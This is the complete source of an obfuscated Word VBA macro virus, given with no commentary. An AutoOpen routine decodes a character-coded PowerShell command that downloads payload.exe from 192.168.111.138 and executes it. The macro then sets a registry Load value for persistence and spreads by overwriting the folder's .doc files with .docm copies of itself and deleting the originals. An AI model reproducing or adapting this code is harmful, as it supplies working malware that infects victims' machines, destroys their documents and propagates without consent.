Public Const path As String = "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies"
Sub Downloadfile()

    Dim str As String
    Dim A As String
    Dim B As String
    Dim C As String
    Dim D As String
    Dim E As String
    Dim F As String
    A = ChrW(112) & ChrW(111) & ChrW(119) & ChrW(101) & ChrW(114) & ChrW(115) & ChrW(104) & ChrW(101) & ChrW(108) & ChrW(108) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101) & ChrW(32) & ChrW(34) & ChrW(40) & ChrW(110) & ChrW(101) & ChrW(119) & ChrW(45) & ChrW(111) & ChrW(98) & ChrW(106) & ChrW(101) & ChrW(99) & ChrW(116) & ChrW(32) & ChrW(110) & ChrW(101)
    B = ChrW(116) & ChrW(46) & ChrW(119) & ChrW(101) & ChrW(98) & ChrW(99) & ChrW(108) & ChrW(105) & ChrW(101) & ChrW(110) & ChrW(116) & ChrW(41) & ChrW(46) & ChrW(68) & ChrW(111) & ChrW(119) & ChrW(110) & ChrW(108) & ChrW(111) & ChrW(97) & ChrW(100) & ChrW(70) & ChrW(105) & ChrW(108) & ChrW(101) & ChrW(40) & ChrW(39) & ChrW(104) & ChrW(116) & ChrW(116)
    C = ChrW(112) & ChrW(58) & ChrW(47) & ChrW(47) & ChrW(49) & ChrW(57) & ChrW(50) & ChrW(46) & ChrW(49) & ChrW(54) & ChrW(56) & ChrW(46) & ChrW(49) & ChrW(49) & ChrW(49) & ChrW(46) & ChrW(49) & ChrW(51) & ChrW(56) & ChrW(47) & ChrW(112) & ChrW(97) & ChrW(121) & ChrW(108) & ChrW(111) & ChrW(97) & ChrW(100) & ChrW(46) & ChrW(101) & ChrW(120)
    D = ChrW(101) & ChrW(39) & ChrW(44) & ChrW(39) & ChrW(67) & ChrW(58) & ChrW(92) & ChrW(85) & ChrW(115) & ChrW(101) & ChrW(114) & ChrW(115) & ChrW(92) & ChrW(68) & ChrW(101) & ChrW(102) & ChrW(97) & ChrW(117) & ChrW(108) & ChrW(116) & ChrW(92) & ChrW(65) & ChrW(112) & ChrW(112) & ChrW(68) & ChrW(97) & ChrW(116) & ChrW(97) & ChrW(92) & ChrW(82)
    E = ChrW(111) & ChrW(97) & ChrW(109) & ChrW(105) & ChrW(110) & ChrW(103) & ChrW(92) & ChrW(77) & ChrW(105) & ChrW(99) & ChrW(114) & ChrW(111) & ChrW(115) & ChrW(111) & ChrW(102) & ChrW(116) & ChrW(92) & ChrW(87) & ChrW(105) & ChrW(110) & ChrW(100) & ChrW(111) & ChrW(119) & ChrW(115) & ChrW(92) & ChrW(67) & ChrW(111) & ChrW(111) & ChrW(107) & ChrW(105)
    F = ChrW(101) & ChrW(115) & ChrW(92) & ChrW(112) & ChrW(97) & ChrW(121) & ChrW(108) & ChrW(111) & ChrW(97) & ChrW(100) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101) & ChrW(39) & ChrW(41) & ChrW(32) & ChrW(124) & ChrW(32) & ChrW(105) & ChrW(101) & ChrW(120) & ChrW(34)
    str = A + B + C + D + E + F
    Shell (str)
End Sub
Sub AutoOpen()
    Revershell

End Sub
Function Check() As Boolean
    Dim s As String
    StrFile = Dir(path & "\")
    Check = False
    
    Do While Len(StrFile) > 0
        If StrFile = "payload.exe" Then
         If FileLen(path & "\payload.exe") > 0 Then
            Check = True
            Exit Do
         End If
        End If
        StrFile = Dir
    Loop
End Function
Sub Revershell()
    Dim flag As Boolean
    flag = True
    Dim run
    Dim s As String
    s = "powershell.exe " & path & "\payload.exe ""parameter title"""
    Spread
    If Check = True Then
        Shell (s)
        Exit Sub
    End If
    Downloadfile
    While flag = True
        If Check() = True Then
            Debug.Print s
            flag = False
            run = Shell(s)
            Reg
        End If
    Wend
End Sub
Public Function Reg() As Variant
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load", "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\payload.exe", "REG_SZ"
Set WshShell = Nothing

End Function
Sub Spread()
    Dim StrFile As String
    Dim path As String
    Dim s As String
    Dim Command As String
    Dim name As String
    Dim o As Document
    Set o = ActiveDocument
    path = ActiveDocument.path & "\"
    StrFile = Dir(path)
    Do While Len(StrFile) > 0
        If InStr(StrFile, ".doc") > 0 And InStr(StrFile, ".docm") = 0 Then
            name = Left(StrFile, Len(StrFile) - 5)
            s = path & StrFile
        
            Command = "powershell.exe Copy-Item """ & path & o.name & """ -Destination """ & path & name & ".docm"""
            Debug.Print Command
            Shell (Command)
            Kill s
        End If
        StrFile = Dir
    Loop
End Sub
